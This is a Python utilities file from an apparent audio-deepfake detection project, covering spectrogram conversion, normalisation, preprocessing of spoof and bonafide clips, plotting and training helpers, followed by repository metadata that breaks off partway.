tf.expand_dims(S, 0)\n S_complex = tf.identity(tf.cast(S, dtype=tf.complex64))\n y = tf.contrib.signal.inverse_stft(\n S_complex, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n\n for i in range(hparams.griffin_lim_iters):\n est = tf.contrib.signal.stft(\n y, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n angles = est / tf.cast(\n tf.maximum(1e-8, tf.abs(est)), tf.complex64\n )\n y = tf.contrib.signal.inverse_stft(\n S_complex * angles, hparams.win_size,\n get_hop_size(hparams), hparams.n_fft\n )\n\n return tf.squeeze(y, 0)\n\n\ndef _stft(y, hparams):\n if hparams.use_lws:\n return _lws_processor(hparams).stft(y).T\n else:\n return librosa.stft(\n y=y, n_fft=hparams.n_fft,\n hop_length=get_hop_size(hparams),\n win_length=hparams.win_size,\n pad_mode='constant'\n )\n\n\ndef _istft(y, hparams):\n return librosa.istft(\n y, hop_length=get_hop_size(hparams),\n win_length=hparams.win_size\n )\n\n\n# Those are only correct when using lws!!!\n# (This was messing with Wavenet quality for a long time!)\ndef num_frames(length, fsize, fshift):\n \"\"\"\n Compute number of time frames of spectrogram\n \"\"\"\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M\n\n\ndef pad_lr(x, fsize, fshift):\n \"\"\"\n Compute left and right padding\n \"\"\"\n M = num_frames(len(x), fsize, fshift)\n pad = (fsize - fshift)\n T = len(x) + 2 * pad\n r = (M - 1) * fshift + fsize - T\n return pad, pad + r\n\n\n# Librosa correct padding\ndef librosa_pad_lr(x, fsize, fshift, pad_sides=1):\n \"\"\"\n compute right padding (final frame) or both sides\n padding (first and final frames)\n \"\"\"\n assert pad_sides in (1, 2)\n # return int(fsize // 2)\n pad = (x.shape[0] // fshift + 1) * fshift - x.shape[0]\n\n if pad_sides == 1:\n return 0, pad\n else:\n return pad // 2, pad // 2 + pad % 2\n\n\n# Conversions\n_mel_basis = None\n_inv_mel_basis = None\n\n\ndef _linear_to_mel(spectogram, hparams):\n global _mel_basis\n if _mel_basis is None:\n _mel_basis = _build_mel_basis(hparams)\n return np.dot(_mel_basis, spectogram)\n\n\ndef _mel_to_linear(mel_spectrogram, hparams):\n global _inv_mel_basis\n if 
_inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n return np.maximum(1e-10, np.dot(_inv_mel_basis, mel_spectrogram))\n\n\ndef _mel_to_linear_tensorflow(mel_spectrogram, hparams):\n global _inv_mel_basis\n\n if _inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n\n return tf.transpose(\n tf.maximum(1e-10, tf.matmul(\n tf.cast(_inv_mel_basis, tf.float32),\n tf.transpose(mel_spectrogram, [1, 0]))\n ), [1, 0]\n )\n\n\ndef _build_mel_basis(hparams):\n assert hparams.fmax <= hparams.sample_rate // 2\n return librosa.filters.mel(\n hparams.sample_rate, hparams.n_fft,\n n_mels=hparams.num_mels, fmin=hparams.fmin, fmax=hparams.fmax\n )\n\n\ndef _amp_to_db(x, hparams):\n min_level = np.exp(hparams.min_level_db / 20 * np.log(10))\n return 20 * np.log10(np.maximum(min_level, x))\n\n\ndef _db_to_amp(x):\n return np.power(10.0, x * 0.05)\n\n\ndef _db_to_amp_tensorflow(x):\n return tf.pow(tf.ones(tf.shape(x)) * 10.0, x * 0.05)\n\n\ndef _normalize(S, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return np.clip((2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value,\n -hparams.max_abs_value, hparams.max_abs_value\n )\n else:\n return np.clip(\n hparams.max_abs_value * (\n (S - hparams.min_level_db) / -hparams.min_level_db\n ), 0, hparams.max_abs_value\n )\n\n assert S.max() <= 0 and S.min() - hparams.min_level_db >= 0\n if hparams.symmetric_mels:\n return (2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value\n else:\n return hparams.max_abs_value * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n )\n\n\ndef _denormalize(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n clip_val = np.clip(\n D, -hparams.max_abs_value, hparams.max_abs_value\n )\n return hparams.min_level_db + (\n (clip_val + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n )\n else:\n return hparams.min_level_db + (\n np.clip(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n )\n\n if hparams.symmetric_mels:\n return ((\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (\n 2 * hparams.max_abs_value\n )) + hparams.min_level_db\n )\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\ndef _denormalize_tensorflow(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return hparams.min_level_db + (\n tf.clip_by_value(\n D, -hparams.max_abs_value, hparams.max_abs_value\n ) + hparams.max_abs_value\n ) * -hparams.min_level_db / (2 * hparams.max_abs_value)\n else:\n return (\n tf.clip_by_value(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n ) + hparams.min_level_db\n\n if hparams.symmetric_mels:\n return (\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n ) + hparams.min_level_db\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\n\n# given a path, return list of all files in directory\ndef get_list_of_wav_files(file_path):\n files = os.listdir(file_path)\n absolute_given_dir = os.path.abspath(file_path)\n\n absolute_files = list(map(\n lambda path:\n os.path.join(absolute_given_dir, path), files\n ))\n\n return absolute_files\n\n\ndef convert_to_flac(dir_path):\n for file_path in 
os.listdir(dir_path):\n if file_path.split('.')[-1] != \"flac\":\n read_file = AudioSegment.from_file(\n os.path.join(dir_path, file_path),\n file_path.split('.')[-1]\n )\n os.remove(os.path.join(dir_path, file_path))\n base_name = file_path.split('.')[:-1]\n # read_file = read_file.set_channels(8)\n # base_name = \".\".join(base_name)\n read_file.export(\n os.path.join(dir_path, f\"{base_name[0]}.flac\"),\n format=\"flac\"\n )\n\n\ndef get_target(file_path):\n if '/real/' in file_path:\n return 'real'\n elif '/fake/' in file_path:\n return 'fake'\n\n\ndef save_wav_to_npy(output_file, spectrogram):\n np.save(output_file, spectrogram)\n\n\ndef wav_to_mel(input_file, output_path):\n y, sr = librosa.load(input_file)\n filename = os.path.basename(input_file)\n target = get_target(input_file)\n\n output_file = '{}{}-{}'.format(\n output_path, filename.split('.')[0], target\n )\n\n mel_spec = librosa.feature.melspectrogram\n mel_spectrogram_of_audio = mel_spec(y=y, sr=sr).T\n save_wav_to_npy(output_file, mel_spectrogram_of_audio)\n\n\ndef convert_and_save(\n real_audio_files, output_real, fake_audio_files, output_fake\n):\n for file in real_audio_files:\n wav_to_mel(file, output_real)\n\n print(\n str(len(real_audio_files)) +\n ' real files converted to spectrogram'\n )\n\n for file in fake_audio_files:\n wav_to_mel(file, output_fake)\n\n print(\n str(len(fake_audio_files)) +\n ' fake files converted to spectrogram'\n )\n\n\ndef split_title_line(title_text, max_words=5):\n \"\"\"\n A function that splits any string based on specific character\n (returning it with the string), with maximum number of words on it\n \"\"\"\n seq = title_text.split()\n return '\\n'.join([\n ' '.join(seq[i:i + max_words])\n for i in range(0, len(seq), max_words)\n ])\n\n\ndef plot_spectrogram(\n pred_spectrogram, path, title=None, split_title=False,\n target_spectrogram=None, max_len=None, auto_aspect=False\n):\n if max_len is not None:\n target_spectrogram = target_spectrogram[:max_len]\n pred_spectrogram = pred_spectrogram[:max_len]\n\n if split_title:\n title = split_title_line(title)\n\n fig = plt.figure(figsize=(10, 8))\n # Set common labels\n fig.text(\n 0.5, 0.18, title,\n horizontalalignment='center', fontsize=16\n )\n\n # target spectrogram subplot\n if target_spectrogram is not None:\n ax1 = fig.add_subplot(311)\n ax2 = fig.add_subplot(312)\n\n if auto_aspect:\n im = ax1.imshow(\n np.rot90(target_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax1.imshow(\n np.rot90(target_spectrogram),\n interpolation='none'\n )\n\n ax1.set_title('Target Mel-Spectrogram')\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax1\n )\n\n ax2.set_title('Predicted Mel-Spectrogram')\n else:\n ax2 = fig.add_subplot(211)\n\n if auto_aspect:\n im = ax2.imshow(\n np.rot90(pred_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax2.imshow(\n np.rot90(pred_spectrogram),\n interpolation='none'\n )\n\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax2\n )\n\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\ndef process_audio_files(filename, dirpath):\n audio_array, sample_rate = librosa.load(\n os.path.join(dirpath, 'flac', filename), sr=16000\n )\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin'\n 
]).T\n \"\"\"\n\n label_name = filename.split('_')[-1].split('.')[0]\n if (label_name == 'bonafide') or ('target' in label_name):\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n return mel_spec_array, label\n\ndef convert_audio_to_processed_list(\n input_audio_array_list, filename, dirpath\n):\n label_name = filename.split('_')[-1].split('.')[0]\n out_list = []\n\n if label_name == 'spoof':\n audio_array_list = [input_audio_array_list[0]]\n choose_random_one_ind = np.random.choice(\n np.arange(1, len(input_audio_array_list))\n )\n audio_array_list.append(\n input_audio_array_list[choose_random_one_ind]\n )\n label = 0\n\n elif (label_name == 'bonafide') or ('target' in label_name):\n audio_array_list = input_audio_array_list\n label = 1\n else:\n audio_array_list = [input_audio_array_list[0]]\n label = None\n\n for audio_array in audio_array_list:\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n out_list.append([mel_spec_array, label])\n\n return out_list\n\n\ndef preprocess_and_save_audio_from_ray_parallel(\n dirpath, mode, recompute=False, dir_num=None, isaug=False\n):\n if isaug:\n preproc_filename = f'{mode}_preproc_aug.npy'\n else:\n preproc_filename = f'{mode}_preproc.npy'\n\n # if mode != 'train':\n # preproc_filename = f'{mode}_preproc.npy'\n\n if dir_num is not None:\n base_path = base_data_path[dir_num]\n else:\n base_path = base_data_path[0]\n\n is_file = os.path.isfile(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ))\n\n if not is_file or recompute:\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n num_cores = multiprocessing.cpu_count() - 1\n\n if isaug:\n precproc_list_saved = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files_with_aug)(\n filename, dirpath\n ) for filename in tqdm(filenames)\n )\n\n # Flatten the list\n print(\n f\"******original len of preproc_list:\",\n len(precproc_list_saved)\n )\n precproc_list = []\n for i in range(len(precproc_list_saved)):\n precproc_list.extend(precproc_list_saved[i])\n\n \"\"\"\n precproc_list = [\n item for sublist in precproc_list\n for item in sublist\n ]\n \"\"\"\n print(\n f\"******flattened len of preproc_list:\",\n len(precproc_list)\n )\n else:\n precproc_list = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files)(filename, dirpath)\n for filename in tqdm(filenames)\n )\n\n precproc_list = [x for x in precproc_list if x[1] is not None]\n\n if not os.path.isdir(f'{base_path}/preprocessed_data'):\n os.mkdir(f'{base_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\ndef process(*args, **kwargs):\n return process_audio_files_inference(*args, **kwargs)\n\ndef load_melspectrogram(path, is_raw_audio=False):\n if is_raw_audio:\n audio_array = path\n else:\n audio_array, sample_rate = librosa.load(path, sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n 
trim_audio_array, hparams=hparams\n ).T\n\n return mel_spec_array\n\ndef process_audio_files_inference(\n filename, dirpath, mode, normalize=False\n):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n elif type(filename) == np.ndarray:\n filename = os.path.join(*filename)\n\n path = os.path.join(dirpath, filename)\n mel_spec_array = load_melspectrogram(path)\n\n # https://stackoverflow.com/questions/57072513/\n duration = get_duration(filename)\n\n if mode == 'unlabeled':\n return mel_spec_array\n elif mode == 'real':\n label = 0\n elif mode == 'fake':\n label = 1\n elif mode in (0, 1):\n label = mode\n else:\n raise ValueError(f'BAD MODE {mode}')\n\n return mel_spec_array, label, duration\n\n\ndef get_durations(filenames, dirpath='', show_pbar=True):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n durations = []\n for k in iterable:\n filename = filenames[k]\n if show_pbar:\n iterable.set_description(str(filename))\n\n duration = get_duration(filename, dirpath)\n durations.append(duration)\n\n return durations\n\n\ndef get_duration(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n duration = file.frames / file.samplerate\n return duration\n\ndef get_frames(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n frames = file.frames\n return frames\n\n\ndef preprocess_from_filenames(\n filenames, dirpath, mode, use_parallel=True,\n show_pbar=True, num_cores=None, func=process,\n cache=None, cache_threshold=30, normalize=False\n):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n if num_cores is None:\n num_cores = multiprocessing.cpu_count()\n\n arg_list = []\n cache_list = []\n\n if use_parallel:\n process_list = []\n\n for k in iterable:\n filename = filenames[k]\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n delayed_func = delayed(func)\n args = (filename, dirpath, file_mode, normalize)\n\n if args in cache:\n data = cache[args]\n cache_list.append(data)\n continue\n\n process = delayed_func(*args)\n process_list.append(process)\n arg_list.append(args)\n\n preproc_list = Parallel(n_jobs=num_cores)(process_list)\n\n else:\n preproc_list = []\n for k in iterable:\n filename = filenames[k]\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n args = (filename, dirpath, file_mode, normalize)\n if args in cache:\n data = self.cache[args]\n preproc_list.append(data)\n continue\n\n preproc_list.append(func(*args))\n arg_list.append(args)\n\n durations = []\n for k, data in enumerate(preproc_list):\n mel_spec_array, label, duration = data\n durations.append(duration)\n args = arg_list[k]\n\n if (duration > cache_threshold) and (args not in cache):\n cache[args] = data\n\n # print('MAX DURATIONS', max(durations))\n preproc_list.extend(cache_list)\n return preproc_list\n\n\ndef preprocess_parallel(*args, **kwargs):\n return preprocess_from_ray_parallel_inference(*args, **kwargs)\n\ndef 
preprocess_from_ray_parallel_inference(\n dirpath, mode, use_parallel=True\n):\n filenames = os.listdir(os.path.join(dirpath, mode))\n return preprocess_from_filenames(\n filenames=filenames, dirpath=dirpath, mode=mode,\n use_parallel=use_parallel\n )\n\n\ndef preprocess_and_save_audio_from_ray(dirpath, mode, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n label_name = filename.split('_')[-1].split('.')[0]\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(f'{base_data_path}/preprocessed_data'):\n os.mkdir(f'{base_data_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ), precproc_list)\n\n \"\"\"\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n \"\"\"\n else:\n print(\"Preprocessing already done!\")\n\n\ndef preprocess_and_save_audio(dirpath, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate,\n n_mels=model_params['num_freq_bin']\n ).T\n\n label_name = filename.split('_')[-1].split('.')[0]\n\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(os.path.join(dirpath, 'preproc')):\n os.mkdir(os.path.join(dirpath, 'preproc'))\n\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\n\ndef describe_array(arr):\n print(\n f\"Mean duration: {arr.mean()}\" +\n \"\\nStandard Deviation: {arr.std()}\" +\n \"\\nNumber of Clips: {len(arr)}\"\n )\n plt.hist(arr, bins=40)\n plt.show()\n\n\ndef get_durations_from_dir(audio_dir, file_extension='.wav'):\n durations = list()\n\n for root, dirs, filenames in os.walk(audio_dir):\n for file_name in filenames:\n if file_extension in file_name:\n file_path = os.path.join(root, file_name)\n audio = AudioSegment.from_wav(file_path)\n duration = audio.duration_seconds\n durations.append(duration)\n\n return np.array(durations)\n\n\ndef get_zero_pad(batch_input):\n 
# find max length\n max_length = np.max([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n curr_length = len(arr)\n pad_length = max_length - curr_length\n\n if len(arr.shape) > 1:\n arr = np.concatenate([\n arr, np.zeros((pad_length, arr.shape[-1]))\n ])\n else:\n arr = np.concatenate([arr, np.zeros(pad_length)])\n\n batch_input[i] = arr\n\n return batch_input\n\n\ndef truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n for i, arr in enumerate(batch_input):\n batch_input[i] = arr[:min_arr_len]\n return batch_input\n\n\ndef random_truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n upper_limit_start_point = len(arr) - min_arr_len\n\n if upper_limit_start_point > 0:\n start_point = np.random.randint(0, upper_limit_start_point)\n else:\n start_point = 0\n\n batch_input[i] = arr[start_point:(start_point + min_arr_len)]\n\n return batch_input\n\n\nclass f1_score_callback(object):\n def __init__(\n self, x_val_inp, y_val_inp, model_save_filename=None,\n save_model=True\n ):\n self.x_val = x_val_inp\n self.y_val = y_val_inp\n self.model_save_filename = model_save_filename\n self.save_model = save_model\n self._val_f1 = 0\n\n self.f1_score_value = None\n\n def on_train_begin(self, logs=None):\n self.f1_score_value = []\n\n def on_epoch_end(self, epoch, logs=None):\n y_val = self.y_val\n datagen_val = DataGenerator(self.x_val, mode='test')\n y_pred = self.model.predict_generator(\n datagen_val, use_multiprocessing=False, max_queue_size=50\n )\n y_pred_labels = np.zeros((len(y_pred)))\n y_pred_labels[y_pred.flatten() > 0.5] = 1\n\n self._val_f1 = f1_score(y_val, y_pred_labels.astype(int))\n print(f\"val_f1: {self._val_f1:.4f}\")\n self.f1_score_value.append(self._val_f1)\n\n if self.save_model:\n if self._val_f1 >= max(self.f1_score_value):\n print(\"F1 score has improved. 
Saving model.\")\n self.model.save(self.model_save_filename)\n\n try:\n foundations.log_metric('epoch_val_f1_score', self._val_f1)\n foundations.log_metric(\n 'best_f1_score', max(self.f1_score_value)\n )\n except Exception as e:\n print(e)\n\n return\n\n\nclass DataGenerator(object):\n def __init__(\n self, x_set, y_set=None, sample_weights=None,\n batch_size=model_params['batch_size'], shuffle=False,\n mode='train'\n ):\n self.x, self.y = x_set, y_set\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.mode = mode\n self.sample_weights = sample_weights\n\n if self.mode != 'train':\n self.shuffle = False\n\n self.n = 0\n self.max = self.__len__()\n\n def __len__(self):\n return int(np.ceil(len(self.x) / float(self.batch_size)))\n\n def __getitem__(self, idx):\n batch_x = self.x[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n batch_x = get_zero_pad(batch_x)\n # batch_x = random_truncate_array(batch_x)\n batch_x = np.array(batch_x)\n batch_x = batch_x.reshape((len(batch_x), -1, hparams.num_mels))\n\n if self.mode != 'test':\n batch_y = self.y[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n\n # read your data here using the batch lists,\n # batch_x and batch_y\n\n if self.mode == 'train':\n return np.array(batch_x), np.array(batch_y)\n if self.mode == 'val':\n return np.array(batch_x), np.array(batch_y)\n else:\n return np.array(batch_x)\n\n def __next__(self):\n if self.n >= self.max:\n self.n = 0\n\n result = self.__getitem__(self.n)\n self.n += 1\n return result\n", "repo_name": "milselarch/AISG", "sub_path": "FakeVoiceTorch/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 35619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 34, "usage_type": "call"}, {"api_name": "librosa.display.core.load", "line_number": 43, "usage_type": "call"}, {"api_name": "librosa.display.core", "line_number": 43, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scipy.signal.lfilter", "line_number": 60, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 60, "usage_type": "name"}, {"api_name": "scipy.signal.lfilter", "line_number": 66, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 66, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 99, "usage_type": "call"}, {"api_name": 
"librosa.display.effects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "lws.lws", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.complex", "line_number": 267, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.angle", "line_number": 271, "usage_type": "call"}, {"api_name": "librosa.display.stft", "line_number": 314, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 314, "usage_type": "name"}, {"api_name": "librosa.display.istft", "line_number": 323, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 385, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 393, "usage_type": "attribute"}, {"api_name": "librosa.display.filters.mel", "line_number": 405, "usage_type": "call"}, {"api_name": "librosa.display.filters", "line_number": 405, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 405, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 462, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 507, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path", "line_number": 508, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 512, "usage_type": "call"}, {"api_name": "os.path", "line_number": 512, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 519, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 521, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 521, "usage_type": 
"name"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path", "line_number": 525, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 543, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 547, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 547, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 548, "usage_type": "call"}, {"api_name": "os.path", "line_number": 548, "usage_type": "attribute"}, {"api_name": "librosa.display.feature", "line_number": 555, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 603, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 603, "usage_type": "name"}, {"api_name": "numpy.rot90", "line_number": 617, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 622, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 643, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 653, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 653, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 654, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 654, "usage_type": "name"}, {"api_name": "librosa.display.load", "line_number": 658, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 658, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 659, "usage_type": 